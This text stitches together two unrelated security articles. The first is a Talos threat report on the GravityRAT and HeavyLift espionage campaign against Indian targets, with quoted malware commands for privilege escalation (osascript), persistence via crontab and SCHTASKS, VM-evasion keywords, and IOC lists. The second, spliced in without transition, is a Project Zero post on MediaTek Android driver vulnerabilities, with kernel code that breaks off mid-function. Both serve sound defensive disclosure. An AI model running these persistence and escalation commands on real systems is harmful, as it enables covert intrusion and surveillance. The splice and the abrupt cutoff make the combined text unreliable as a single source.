By Gi7w0rm, Asheer Malhotra and Vitor Ventura. 

  • Cisco Talos is disclosing a new malware campaign called “Operation Celestial Force” running since at least 2018. It is still active today, employing the use of GravityRAT, an Android-based malware, along with a Windows-based malware loader we track as “HeavyLift.”  
  • All GravityRAT and HeavyLift infections are administered by a standalone tool we are calling “GravityAdmin,” which carries out malicious activities on an infected device. Analysis of the panel binaries reveals that they are meant to administer and run multiple campaigns at the same time, all of which are codenamed and have their own admin panels.  
  • Talos attributes this operation with high confidence to a Pakistani nexus of threat actors we’re calling “Cosmic Leopard,” focused on espionage and surveillance of their targets.  This multiyear operation continuously targeted Indian entities and individuals likely belonging to defense, government and related technology spaces. Talos initially disclosed the use of the Windows-based GravityRAT malware by suspected Pakistani threat actors in 2018 — also used to target Indian entities.  
  • While this operation has been active for at least the past six years, Talos has observed a general uptick in the threat landscape in recent years, with respect to the use of mobile malware for espionage to target high-value targets, including the use of commercial spyware

Operation Celestial Force: A multi-campaign, multi-component infections operation 

Talos assesses with high confidence that this series of campaigns we’re clustering under the umbrella of “Operation Celestial Force” is conducted by a nexus of Pakistani threat actors. The tactics, techniques, tooling and victimology of Cosmic Leopard contain some overlaps with those of Transparent Tribe, another suspected Pakistani APT group, which has a history of targeting high-value individuals from the Indian subcontinent. However, we do not have enough technical evidence to link both the threat actors together for now, therefore we track this cluster of activity under the “Cosmic Leopard” tag. 

Operation Celestial Force has been active since at least 2018 and continues to operate today — increasingly utilizing an expanding and evolving malware suite — indicating that the operation has likely seen a high degree of success targeting users in the Indian subcontinent. Cosmic Leopard initially began the operation with the creation and deployment of the Windows based GravityRAT malware family distributed via malicious documents (maldocs). Cosmic Leopard then created Android-based versions of GravityRAT to widen their net of infections to begin targeting mobile devices around 2019. During the same year, Cosmic Leopard also expanded their arsenal to use the HeavyLift malware family as a malware loader. HeavyLift is primarily wrapped in malicious installers sent to targets tricked into running the into running the malware via social engineering techniques. 

Some campaigns from this multi-year operation have been disclosed and loosely attributed to Pakistani threat actors in previous reporting. However, there has been little evidence to tie all of them together until now. Each campaign in the operation has been codenamed by the threat actor and managed/administered using custom-built panel binaries we call “GravityAdmin.” 

Adversaries like Cosmic Leopard may use low-sophistication techniques such as social engineering and spear phishing, but will aggressively target potential victims with various TTPs. Therefore, organizations must remain vigilant against such motivated adversaries conducting targeted attacks by educating users on proper cyber hygiene and implementing defense-in-depth models to protect against such attacks across various attack surfaces.

Initiating contact and infecting targets 

This campaign primarily utilizes two infection vectors — spear phishing and social engineering. Spear phishing consists of messages sent to targets with pertinent language and maldocs that contain malware such as GravityRAT. 

The other infection vector, gaining popularity in this operation, and now a staple tactic of the Cosmic Leopard’s operations consists of contacting targets over social media channels, establishing trust with them and eventually sending them a malicious link to download either the Windows- or Android-based GravityRAT or the Windows-based loader, HeavyLift. 

Operation Celestial Force employs mobile and desktop malware to target Indian entities
 Malicious drop site delivering HeavyLift. 

Operation Celestial Force’s malware and its management interfaces 

Talos’ analysis reveals the use of multiple components, including Android- and Windows-based malware, and administrative binaries supporting multiple campaign panels used by Operation Celestial Force. 

  • GravityRAT: GravityRAT, a closed-source malware family, first disclosed by Talos in 2018, is a Windows- and Android-based RAT used to target Indian entities.  
  • HeavyLift: A previously unknown Electron-based malware loader family distributed via malicious installers targeting the Windows operating system.  
  • GravityAdmin: A tool to administer infected systems (panel binary), used by operators since at least 2021, by connecting to GravityRAT’s and HeavyLift’s C2 servers. GravityAdmin consists of multiple inbuilt User Interfaces (UIs) that correspond to specific, codenamed, campaigns being operated by malicious operators.   

Operation Celestial Force’s infection chains are:  

Operation Celestial Force employs mobile and desktop malware to target Indian entities

GravityAdmin: Panel binaries administering the campaigns 

The Panel binaries we analyzed consist of multiple versions with the earliest compiled in August 2021. The panel binary asks for a user ID, password and campaign ID (from a drop-down menu) from the operator when it runs.  

Operation Celestial Force employs mobile and desktop malware to target Indian entities
 Login screen for GravityAdmin titled “Bits Before Bullets.”

When the operator clicks the login button, the executable will check if it is connected to the internet by sending a ping request to www[.]google[.]com. Then, the user ID and password are authenticated with an authentication server which sends back: 

  • A code to direct the panel binary to open the panel UI for the specified panel. 
  • Also sends a value back via the HTTP “Authorization” Header. This value acts as an authentication token when communicating with campaign-specific[ C2 servers to load data such as a list of infected machines, etc. 

A typical Panel screen will list the machines infected as part of the specific campaign. It also has buttons to trigger various malicious actions against one or more infected systems.  

Operation Celestial Force employs mobile and desktop malware to target Indian entities

Different panels have different capabilities, however, some core capabilities are common across all campaigns. 

The various campaigns configured in the Panel binaries are code named as: 

  • "SIERRA" 
  • "QUEBEC" 
  • "ZULU" 
  • "DROPPER" 
  • "WORDDROPPER" 
  • "COMICUM" 
  • "ROCKAMORE" 
  • "FOXTROT" 
  • "CLOUDINFINITY" 
  • "RECOVERBIN" 
  • "CVSCOUT" 
  • "WEBBUCKET" 
  • "CRAFTWITHME" 
  • "SEXYBER" 
  • "CHATICO" 

Each of the codenamed campaigns from the Panel binaries consists of its own infection mechanisms. For example, “FOXTROT,” “CLOUDINFINITY” and “CHATICO” are names given to all Android-based GravityRAT infections whereas “CRAFTWITHME,” “SEXYBER” and “CVSCOUT” are named for attacks deploying HeavyLift. Our analysis correlates the campaigns listed above with the Operating Systems being targeted with respective malware families. 

Campaign Name 

Platform targeted and Malware Used 

SIERRA 

Windows, GravityRAT 

QUEBEC 

Windows, GravityRAT 

ZULU 

Windows, GravityRAT 

DROPPER / WORDDROPPER / COMICUM  

Windows, GravityRAT 

ROCKAMORE 

Windows, GravityRAT 

FOXTROT / CLOUDINFINITY / RECOVERBIN / CHATICO    

Android, GravityRAT 

CVSCOUT 

Windows, HeavyLift 

WEBBUCKET / CRAFTWITHME 

Windows, HeavyLift 

SEXYBER 

Windows, HeavyLift 

Most campaigns consist of infrastructure overlaps between each other mostly to host malicious payloads or maintain a list of infected systems. 

Malicious domain 

Campaigns using the domain 

mozillasecurity[.]com 

SIERRA  

QUEBEC 

DROPPER 

officelibraries[.]com 

SIERRA 

DROPPER 

ZULU 

GravityRAT: A multi-platform remote access trojan

GravityRAT is a Windows-based remote access trojan first disclosed by Talos in 2018. GravityRAT was later ported to the Android operating system to target mobile devices around 2019. Since 2019, we’ve observed a continuous addition of a multitude of capabilities in GravityRAT and its associated infrastructure. So far, we have observed the use of GravityRAT exclusively by suspected Pakistani threat actors to target entities and individuals in India. There is currently no publicly available evidence to suggest that GravityRAT is a commodity/open-source malware, suggesting its potential use by multiple, disparate threat actors. 

Our analysis of the entire ecosystem of Operation Celestial Force revealed that GravityRAT’s use in this campaign likely began as early as 2016 and continues to this day. 

The latest variants of GravityRAT are distributed through malicious websites, some registered and set up as late as early January 2024, pretending to distribute legitimate Android applications. Malicious operators will distribute the download links to their targets over social media channels asking them to download and install the malware. 

The latest variants of GravityRAT use the previously mentioned code names to define the campaigns. The screenshot below shows the initial registration of a victim into the C2, getting back a list of alternative C2 to be used, if needed.  

Operation Celestial Force employs mobile and desktop malware to target Indian entities
 The group uses Cloudflare service to hide the true location of their C2 servers.

After registration, the trojan requests tasks to execute to the C2 followed by uploading a file containing the device's location.  

The trojan will use a different user-agent for each request — it's unclear if this is done on purpose, or if this anomaly is just the result of cut-and-paste code from other projects to tie together this trojan’s features.  

GravityRAT requests the following permissions on the device for stealing information and housekeeping tasks. 

Operation Celestial Force employs mobile and desktop malware to target Indian entities

These variants of GravityRAT are similar to previously disclosed versions from ESET and Cyble and consist of the following capabilities: 

  1. Send preliminary information about the device to the C2. This information includes IMEI, phone number, network country ISO code, network operator name, SIM country ISO code, SIM operator name, SIM serial number, device model, brand, product and manufacturer, addresses surrounding the obtained longitude and latitude of the device and the current build information, including release, host, etc. 
  2. Read SMS data and content and upload to the C2. 
  3. Read specific file formats and upload them to the C2. 
  4. Read call logs and upload them to the C2. 
  5. Obtain IMEI information including associated email ID and send it to C2. 
  6. Delete all contacts, call logs and files related to the malware. 

HeavyLift: Electron-based malware loader

Some of the campaigns in this operation use Electron-based malware loaders we’re calling “HeavyLift,” which consist of JavaScript code communicating and controlled by C2 servers. These are the same C2 servers that interact with GravityAdmin, the panel tool used by the operators to govern infected systems. HeavyLift is essentially a stage one malware component that downloads and installs other malicious implants whenever available on the C2 server. HeavyLift bears some similarities with GravityRAT’s Electron versions disclosed previously by Kaspersky in 2020. 

A HeavyLift infection begins with an executable masquerading as an installer for a legitimate application. The installer installs a dummy application but also installs and sets up a malicious Electron-based desktop application. This malicious application is, in fact, HeavyLift and consists of JavaScript code that carries out malicious operations on the infected system. 

On execution, HeavyLift will check if it is running on a macOS or Windows system. If it is running on macOS, and not running as root, it will execute with admin privileges using the command: 

 /usr/bin/osascript -e 'do shell script "bash -c " _process_path " with administrator privileges'  

If it is running as root, it will set the default HTTP User-Agent to “M_9C9353252222ABD88B123CE5A78B70F6”, then get system info using the commands: 

system_profiler SPHardwareDataType | grep 'Model Name' 

system_profiler SPHardwareDataType | grep 'SMC' 

system_profiler SPHardwareDataType | grep 'Model Identifier' 

system_profiler SPHardwareDataType | grep 'ROM' 

system_profiler SPHardwareDataType | grep 'Serial Number'  

For a Windows-based system, the HTTP User-Agent is set to “W_9C9353252222ABD88B123CE5A78B70F6”. The malware will then obtain preliminary system information such as: 

  • Processor ID 
  • MAC address 
  • Installed anti-virus product name 
  • Username 
  • Domain name 
  • Platform information 
  • Process, OS architecture 
  • Agent (hardcoded value) 
  • OS release number 

All this preliminary information is sent to the hardcoded C2 server URL to register the infection with the C2. 

HeavyLift will then reach out to the C2 server to poll for any new payloads to execute on the infected system. A payload received from the C2 will be dropped to a directory in the “AppData” directory and persisted on the system. 

On macOS, the payload is a ZIP file that is extracted, and the resulting binary persists using crontab via the command: 

crontab -l 2>/dev/null; echo ' */2 * * * * “_filepath_” _arguments_ ‘ | crontab - 

For Windows, the payload received is an EXE file that persists on the system via a scheduled task. The malware will create an XML file for the scheduled tasks with the payload path, arguments and working directory and then use the XML to set up the schedtask: 

SCHTASKS /Create /XML "_xmlpath_" /TN "_taskname_" /F 

The malware will then open the accompanying HTML file via web view to appear legitimate. 

 In some cases, the malware will also perform anti-analysis checks to see if it’s running in a virtual environment.  

It checks for the presence of specific keywords before closing if there is a match: 

  • Innotek GmbH 
  • VirtualBox 
  • VMware 
  • Microsoft Corporation 
  • HITACHI

These keywords are checked against model information, SMC, ROM and serial numbers on macOS and Windows against manufacturer information, such as product, vendor, processor and more. 

Coverage 

Ways our customers can detect and block this threat are listed below.  

Operation Celestial Force employs mobile and desktop malware to target Indian entities

 Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.  

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.  

 Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.  

 Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.  

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.  

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.  

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.  

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.  

 Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.  

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.  

 

 

IOCs 

IOCs for this research can also be found at our GitHub repository here

HeavyLift 

8e9bcc00fc32ddc612bdc0f1465fc79b40fc9e2df1003d452885e7e10feab1ee
ceb7b757b89693373ffa1c46dd96544bdc25d1a47608c2ea24578294bcf1db37 
06b617aa8c38f916de8553ff6f572dcaa96e5c8941063c55b6c424289038c3a1 
da3907cf75662c3401581a5140831f8b2520a4c3645257b3860c7db94295af88 
838fd5d269fa09ef4f7e9f586b6577a9f46123a0af551de02de78501d916236d 
12d98137cd1b0cf59ce2fafbfe3a9c3477a42dae840909adad5d4d9f05dd8ede 
688c8e4522061bb9d82e4c3584f7ef8afc6f9e07e2374567755faad2a22e25b8 
5695c1e5e4b381844a36d8281126eef73a9641a315f3fdd2eb475c9073c5f4da 
8d458fb59b6da20e1ba1658bb4a1f7dbb46d894530878e91b64d3c675d3d4516

 

GravityRAT Android 

36851d1da9b2f35da92d70d4c88ea1675f1059d68fafd3abb1099e075512b45e 
4ebdfa738ef74945f6165e337050889dfa0aad61115b738672bbeda648a59dab 
1382997d3a5bb9bdbb9d41bb84c916784591c7cdae68305c3177f327d8a63b71 
c00cedd6579e01187cd256736b8a506c168c6770776475e8327631df2181fae2 
380df073825aca1e2fdbea379431c2f4571a8c7d9369e207a31d2479fbc7be88

  

GravityAdmin 

63a76ca25a5e1e1cf6f0ca8d32ce14980736195e4e2990682b3294b125d241cf 
69414a0ca1de6b2ab7b504a507d35c859fc5a1b8e0b3cf0c6a8948b2f652cbe9 
04e216f4780b6292ccc836fa0481607c62abb244f6a2eedc21c4a822bcf6d79f

 

Network IOCs 

 androidmetricsasia[.]com 
dl01[.]mozillasecurity[.]com 
officelibraries[.]com 
javacdnlib[.]com 
windowsupdatecloud[.]com 
webbucket[.]co[.]uk 
craftwithme[.]uk 
sexyber[.]net 
rockamore[.]co[.]uk 
androidsdkstream[.]com 
playstoreapi[.]net 
sdklibraries[.]com 
cvscout[.]uk 
zclouddrive[.]com 
jdklibraries[.]com 
cloudieapp[.]net 
androidadbserver[.]com 
androidwebkit[.]com 
teraspace[.]co[.]in

  

hxxps[://]zclouddrive[.]com/downloads/CloudDrive_Setup_1[.]0[.]1[.]exe 
hxxps[://]www[.]sexyber[.]net/downloads/7ddf32e17a6ac5ce04a8ecbf782ca509/Sexyber-1[.]0[.]0[.]zip 
hxxps[://]sexyber[.]net/downloads/7ddf32e17a6ac5ce04a8ecbf782ca509/Sexyber-1[.]0[.]0[.]zip 
hxxps[://]cloudieapp[.]net/cloudie[.]zip 
hxxps[://]sni1[.]androidmetricsasia[.]com/voilet/8a99d28c[.]php 
hxxps[://]dev[.]androidadbserver[.]com/jurassic/6c67d428[.]php 
hxxps[://]adb[.]androidadbserver[.]com/jurassic/6c67d428[.]php 
hxxps[://]library[.]androidwebkit[.]com/kangaroo/8a99d28c[.]php 
hxxps[://]ux[.]androidwebkit[.]com/kangaroo/8a99d28c[.]php 
hxxps[://]jupiter[.]playstoreapi[.]net/indigo/8a99d28c[.]php 
hxxps[://]moon[.]playstoreapi[.]net/indigo/8a99d28c[.]php 
hxxps[://]sni1[.]androidmetricsasia[.]com/voilet/8a99d28c[.]php 
hxxps[://]moon[.]playstoreapi[.]net/indigo/8a99d28c[.]php 
hxxps[://]moon[.]playstoreapi[.]net/indigo/8a99d28c[.]php 
hxxps[://]jre[.]jdklibraries[.]com/hotriculture/671e00eb[.]php  
hxxps[://]jre[.]jdklibraries[.]com/hotriculture/671e00eb[.]php  
hxxps[://]cloudinfinity-d4049-default-rtdb[.]firebaseio[.]com/ 
hxxps[://]dl01[.]mozillasecurity[.]com/ 
hxxps[://]dl01[.]mozillasecurity[.]com/Sier/resauth[.]php 
hxxps[://]dl01[.]mozillasecurity[.]com/resauth[.]php/ 
hxxps[://]tl37[.]officelibraries[.]com/Sier/resauth[.]php 
hxxps[://]tl37[.]officelibraries[.]com/resauth[.]php/ 
hxxps[://]jun[.]javacdnlib[.]com/Quebec/5be977ac[.]php 
hxxps[://]dl01[.]mozillasecurity[.]com/resauth[.]php/ 
hxxps[://]dl01[.]mozillasecurity[.]com/MicrosoftUpdates/6efbb147[.]php 
hxxps[://]tl37[.]officelibraries[.]com/MicrosoftUpdates/741bbfe6[.]php 
hxxps[://]tl37[.]officelibraries[.]com/MsWordUpdates/c47d1870[.]php 
hxxps[://]dl01[.]windowsupdatecloud[.]com/opex/7ab24931[.]php 
hxxps[://]tl37[.]officelibraries[.]com/opex/13942BA7[.]php 
hxxp[://]dl01[.]windowsupdatecloud[.]com/opex/7ab24931[.]php 
hxxps[://]tl37[.]officelibraries[.]com/opex/13942BA7[.]php 
hxxps[://]download[.]rockamore[.]co[.]uk/m2c/m_client[.]php 
hxxps[://]api1[.]androidsdkstream[.]com/foxtrot/ 
hxxps[://]api1[.]androidsdkstream[.]com/foxtrot/61c10953[.]php 
hxxps[://]jupiter[.]playstoreapi[.]net/RB/e7a18a38[.]php 
hxxps[://]sdk2[.]sdklibraries[.]com/golf/c6cf642b[.]php 
hxxps[://]jre[.]jdklibraries[.]com/hotriculture/671e00eb[.]php 
hxxps://hxxp[://]api1[.]androidsdkstream[.]com/foxtrot//DataX/ 
hxxps[://]download[.]cvscout[.]uk/cvscout/cvstyler_client[.]php 
hxxps[://]download[.]webbucket[.]co[.]uk/webbucket/strong_client[.]php 
hxxps[://]www[.]craftwithme[.]uk/cwmb/craftwithme/strong_client[.]php 
hxxps[://]download[.]sexyber[.]net/sexyber/sexyberC[.]php 
hxxps[://]download[.]webbucket[.]co[.]uk/A0B74607[.]php 
hxxps[://]zclouddrive[.]com/system/546F9A[.]php 
hxxps[://]download[.]cvscout[.]uk/cvscout/ 
hxxps[://]download[.]cvscout[.]uk/c9a5e83c[.]php 
hxxps[://]zclouddrive[.]com/downloads/CloudDrive_Setup_1[.]0[.]1[.]exe 
hxxps[://]zclouddrive[.]com/system/clouddrive/ 
hxxps[://]www[.]sexyber[.]net/downloads/7ddf32e17a6ac5ce04a8ecbf782ca509/Sexyber-1[.]0[.]0[.]zip 
hxxps[://]sexyber[.]net/downloads/7ddf32e17a6ac5ce04a8ecbf782ca509/Sexyber-1[.]0[.]0[.]zip 
hxxps[://]download[.]sexyber[.]net/0fb1e3a0[.]php 
hxxps[://]www[.]craftwithme[.]uk/cwmb/d26873c6[.]php 
hxxps[://]download[.]teraspace[.]co[.]in/teraspace/ 
hxxps[://]download[.]teraspace[.]co[.]in/78181D14[.]php 
hxxps[://]www[.]craftwithme[.]uk/cwmb/craftwithme/ 
hxxps[://]download[.]webbucket[.]co[.]uk/webbucket/

Driving forward in Android drivers

Posted by Seth Jenkins, Google Project Zero

Introduction

Android's open-source ecosystem has led to an incredible diversity of manufacturers and vendors developing software that runs on a broad variety of hardware. This hardware requires supporting drivers, meaning that many different codebases carry the potential to compromise a significant segment of Android phones. There are recent public examples of third-party drivers containing serious vulnerabilities that are exploited on Android. While there exists a well-established body of public (and In-the-Wild) security research on Android GPU drivers, other chipset components may not be as frequently audited so this research sought to explore those drivers in greater detail.

Driver Enumeration: Not as Easy as it Looks

This research focused on three Android devices (chipset manufacturers in parentheses):

- Google Pixel 7 (Tensor)

- Xiaomi 11T (MediaTek)

- Asus ROG 6D (MediaTek)

In order to perform driver research on these devices I first had to find all of the kernel drivers that were accessible from an unprivileged context on each device; a task complicated by the non-uniformity of kernel drivers (and their permissions structures) across different devices even within the same chipset manufacturer. There are several different methodologies for discovering these drivers. The most straightforward technique is to search the associated filesystems looking for exposed driver device files. These files serve as the primary method by which userland can interact with the driver. Normally the “file” is open’d by a userland process, which then uses a combination of read, write, ioctl, or even mmap to interact with the driver. The driver then “translates” those interactions into manipulations of the underlying hardware device sending the output of that device back to userland as warranted. Effectively all drivers expose their interfaces through the ProcFS or DevFS filesystems, so I focused on the /proc and /dev directories while searching for viable attack surfaces. Theoretically, evaluating all the userland accessible drivers should be as simple as calling find /dev or find /proc, attempting to open every file discovered, and logging which open attempts were successful.

However, there is one major roadblock that prevents this approach from being comprehensive - permissions! SELinux and traditional Linux Discretionary Access Control policies can prevent simple filesystem enumeration from discovering all of the accessible device drivers associated on the filesystem. For example, the untrusted_app SELinux context has search permissions on the device SELinux context for directories, but is not allowed to directly open the directory itself:

sepolicy shows search permission on the "device" SELinux context

This search permission (rather counterintuitively) does not allow the source context to list the contents of directories that have this SELinux target context. Instead, it simply allows such a directory to be in the ancestor directories of the file path that the source context attempts to open. In practice, this means that untrusted_app is allowed to open e.g. /dev/mali0 but is usually not allowed to open /dev itself:

untrusted_app is unable to list /dev but can open files within it like /dev/mali0

In the case of /dev, the shell context is allowed to open and list the contents of /dev. That means that by first enumerating the /dev directory from the shell context, then attempting to open all discovered files from the untrusted_app context, a security researcher can understand what drivers are and are not accessible from an app context in the /dev directory. However, there are cases where certain directories are simply not listable from a debugging-accessible non-root context, particularly in /proc. One option to enumerate all these directories would be to root the phone, however, this is not always easily achievable.

A strategy I found helpful in this regard was to examine publicly released kernel source code for the phone model or for similar phone models. The location of this source code varies significantly from manufacturer to manufacturer, but the source code is usually either hosted on Github or via the manufacturer website. Device drivers create files in /proc primarily via the proc_create() and proc_mkdir() function calls. A real-world example of this would be:

        parent = proc_mkdir("perfmgr", NULL);

        perfmgr_root = parent;

        pe = proc_create("perf_ioctl", 0664, parent, &Fops);

        ...

        pe = proc_create("eara_ioctl", 0664, parent, &eara_Fops);

        ...

        pe = proc_create("eas_ioctl", 0664, parent, &eas_Fops);

        ...

        pe = proc_create("xgff_ioctl", 0664, parent, &xgff_Fops);

        ...

Although these files cannot be directly enumerated, they do exist and are accessible from an untrusted context.

/proc/perfmgr directory contents cannot be listed with ls, but can be open'd

It would have otherwise required rooting the phone to discover this driver without analyzing the kernel source code.

Another useful resource is the SELinux policy itself. Userland interacts with the drivers via a fairly typical set of VFS operations. This means that the SELinux policy must encapsulate the necessary permissions to perform those operations. This means that the SELinux policy generally reflects what the developers intend to be accessible from an untrusted context. Analysis of the policy can lead to the discovery of certain oddities and idiosyncrasies in the accessibility of certain drivers. For example, occasionally a file may not be directly openable via the filesystem, but there may be some alternative method by which an app can ask another more privileged process to open the file on its behalf and hand the associated fd back, after which the app is allowed to read/write/ioctl to the fd itself. One example of this behavior would be the EdgeTPU device on the Pixel 7:

Additional research suggests that untrusted_app can ask a privileged process for access to the EdgeTPU driver fd itself if it lands on an allowlist of certain applications.

The performed surveys strongly imply that the GPU driver is the most consistently accessible driver from an untrusted application, which is expected. On the Google Pixel 7, I did not find much else that was accessible from an entirely unprivileged context. Nevertheless, inspired by previous similar efforts on hardware like Samsung’s NPU, I performed research on the EdgeTPU driver - Google’s tensor processing unit for doing ML related tasks on the Pixel series of devices. This resulted in the discovery of one significant issue - a race condition when registering memory with the EdgeTPU memory while vma’s are concurrently getting modified.

Unlike the Pixel 7, the MediaTek chipset phones (Asus ROG 6D and Xiaomi 11T) contained several different drivers that could be accessed from unprivileged userland:

  • /proc/ged
  • /proc/mtk_jpeg
  • /proc/perfmgr/[eara_ioctl,eas_ioctl,perf_ioctl,xgff_ioctl]

These drivers represent significantly more interesting and complex attack surfaces than what was available on the Pixel 7 device. The ged driver contained numerous interesting and valuable exploitation primitives that we’ll discuss in detail a bit later. While the perfmgr driver presented several attack surfaces, I wasn’t able to find any security-relevant bugs. The mtk_jpeg driver however, yielded significant fruit that deserves a closer look.

MediaTek JPEG Decoding Accelerator

The mtk_jpeg driver manages specialized hardware on MediaTek devices to perform jpeg decoding acceleration. Linux kernel documentation notes that “Mediatek JPEG Decoder is the JPEG decode hardware present in Mediatek SoCs”. More relevantly, from an attacker's point of view, this driver can be accessed (at least on the phones assessed) from the untrusted_app context (although curiously, it cannot be accessed from an unprivileged adb debugging context). This JPEG decoding accelerator and its associated driver is present on both the Xiaomi 11T and the Asus ROG 6D. However, based on open-source codebases for these different devices' kernels, it appears MediaTek is actively maintaining several different trees for this driver, likely based on the associated kernel version, and these two devices use separate trees.

I found two vulnerabilities in this driver. CVE-2023-32837 was a textbook OOB read/write in an array of structs. Various different members of the struct were accessed and modified, creating several different possibilities for exploitation, but also making them significantly more challenging. Interestingly, MediaTek partially fixed this bug in July 2021, although the exact date this patch went out to OEMs is unclear. From the commit message, it’s clear that MediaTek detected this issue with the Coverity static analysis tool, but it appears unlikely that the security impact was identified. Regardless, while the issue was fixed in some of the MediaTek kernel trees, it went unpatched in other versions of that same driver. This meant that while the Asus ROG 6D (running kernel 5.10) had received the patch for this vulnerability, the (otherwise fully patched and security supported) Xiaomi 11T (running 4.14) had not.

Some background knowledge on how the jpeg driver works eases discussion of the other issue, CVE-2023-32832. The accelerator hardware has two separate “cores” that can perform JPEG decoding. When a process requests JPEG decoding work to be performed, it calls the ioctl JPEG_DEC_IOCTL_HYBRID_START, and the kernel decides which decoding core will perform that work inside of jpeg_drv_hybrid_dec_lock()(output has been colorized to ease following along):

static int jpeg_drv_hybrid_dec_lock(int *hwid)

{

        int retValue = 0;

        int id = 0;

        ...

        mutex_lock(&jpeg_hybrid_dec_lock);

        for (id = 0; id < HW_CORE_NUMBER; id++) {

                if (dec_hwlocked[id]) {

                        JPEG_LOG(1, "jpeg dec HW core %d is busy", id);

                        continue;

                } else {

                        *hwid = id;

                        dec_hwlocked[id] = true;

                        JPEG_LOG(1, "jpeg dec get %d HW core", id);

                        _jpeg_hybrid_dec_int_status[id] = 0;

                        jpeg_drv_hybrid_dec_power_on(id);

                        enable_irq(gJpegqDev.hybriddecIrqId[id]);

                        break;

                }

        }

        mutex_unlock(&jpeg_hybrid_dec_lock);

        if (id == HW_CORE_NUMBER) {

                JPEG_LOG(1, "jpeg dec HW core all busy");

                *hwid = -1;

                retValue = -EBUSY;

        }

        return retValue;

}

The array dec_hwlocked contains a boolean element for each core, with that element being set to true for locked cores, and false for unlocked cores. This array is also protected with a mutex to try and prevent concurrent calls to jpeg_drv_hybrid_dec_lock, or jpeg_drv_hybrid_dec_unlock from racing with each other. After locking the core, jpeg_drv_hybrid_dec_start sets up the data-structures to be utilized for the decoding operation:

switch (cmd) {

        case JPEG_DEC_IOCTL_HYBRID_START:

                if (copy_from_user(

                        &taskParams, (void *)arg,

                        sizeof(struct JPEG_DEC_DRV_HYBRID_TASK))) {

                        return -EFAULT;

                }

                ...

                if (jpeg_drv_hybrid_dec_lock(&hwid) == 0) {

                        *pStatus = JPEG_DEC_PROCESS;

                } else {

                        JPEG_LOG(1, "jpeg_drv_hybrid_dec_lock failed (hw busy)");

                        return -EBUSY;

                }

                if (jpeg_drv_hybrid_dec_start(taskParams.data, hwid, &index_buf_fd) == 0) {

                        ...

                } else {

                        JPEG_LOG(0, "jpeg_drv_dec_hybrid_start failed");

                        jpeg_drv_hybrid_dec_unlock(hwid);

                        return -EFAULT;

                }

                break;

...

}

static int jpeg_drv_hybrid_dec_start(unsigned int data[],unsigned int id,int *index_buf_fd)

{

        u64 ibuf_iova, obuf_iova;

        int ret;

        void *ptr;

        unsigned int node_id;

        JPEG_LOG(1, "+ id:%d", id);

        ret = 0;

        ibuf_iova = 0;

        obuf_iova = 0;

        node_id = id / 2;

        bufInfo[id].o_dbuf = jpg_dmabuf_alloc(data[20], 128, 0);

        bufInfo[id].o_attach = NULL;

        bufInfo[id].o_sgt = NULL;

        bufInfo[id].i_dbuf = jpg_dmabuf_get(data[7]);

        bufInfo[id].i_attach = NULL;

        bufInfo[id].i_sgt = NULL;

        if (!bufInfo[id].o_dbuf) {

            JPEG_LOG(0, "o_dbuf alloc failed");

                return -1;

        }

        if (!bufInfo[id].i_dbuf) {

            JPEG_LOG(0, "i_dbuf null error");

                return -1;

        }

        ret = jpg_dmabuf_get_iova(bufInfo[id].o_dbuf, &obuf_iova, gJpegqDev.pDev[node_id], &bufInfo[id].o_attach, &bufInfo[id].o_sgt);

        JPEG_LOG(1, "obuf_iova:0x%llx lsb:0x%lx msb:0x%lx", obuf_iova,

                (unsigned long)(unsigned char*)obuf_iova,

                (unsigned long)(unsigned char*)(obuf_iova>>32));

        ptr = jpg_dmabuf_vmap(bufInfo[id].o_dbuf);

        if (ptr != NULL && data[20] > 0)

                memset(ptr, 0, data[20]);

        jpg_dmabuf_vunmap(bufInfo[id].o_dbuf, ptr);

        jpg_get_dmabuf(bufInfo[id].o_dbuf);

        // get obuf for adding reference count, avoid early release in userspace.

        *index_buf_fd = jpg_dmabuf_fd(bufInfo[id].o_dbuf);

        ret = jpg_dmabuf_get_iova(bufInfo[id].i_dbuf, &ibuf_iova, gJpegqDev.pDev[node_id], &bufInfo[id].i_attach, &bufInfo[id].i_sgt);

        JPEG_LOG(1, "ibuf_iova 0x%llx lsb:0x%lx msb:0x%lx", ibuf_iova,

                (unsigned long)(unsigned char*)ibuf_iova,

                (unsigned long)(unsigned char*)(ibuf_iova>>32));

        if (ret != 0) {

                JPEG_LOG(0, "get iova fail i:0x%llx o:0x%llx", ibuf_iova, obuf_iova);

                return ret;

        }

        ...

        return ret;

}

Finally, utilizing an ioctl call to JPEG_DEC_IOCTL_HYBRID_WAIT (which calls jpeg_drv_hybrid_dec_unlock), resources associated with the core are freed, and the core is released back to be used in future operations.

case JPEG_DEC_IOCTL_HYBRID_WAIT:

                ...

                if (copy_from_user(

                        &pnsParmas, (void *)arg,

                        sizeof(struct JPEG_DEC_DRV_HYBRID_P_N_S))) {

                        JPEG_LOG(0, "Copy from user error");

                        return -EFAULT;

                }

                /* set timeout */

                timeout_jiff = msecs_to_jiffies(3000);

                JPEG_LOG(1, "JPEG Hybrid Decoder Wait Resume Time: %ld",

                                timeout_jiff);

                hwid = pnsParmas.hwid;

                if (hwid < 0 || hwid >= HW_CORE_NUMBER) { //In other versions of the driver, this >= check was omitted, which led to several different OOB accesses later aka CVE-2023-32837

                        JPEG_LOG(0, "get hybrid dec id failed");

                        return -EFAULT;

                }

                if (!dec_hwlocked[hwid]) {

                        JPEG_LOG(0, "wait on unlock core %d\n", hwid);

                        return -EFAULT;

                }

                if (jpeg_isr_hybrid_dec_lisr(hwid) < 0) {

                        long ret = 0;

                        int waitfailcnt = 0;

                        do {

                                ret = wait_event_interruptible_timeout(

                                        hybrid_dec_wait_queue[hwid],

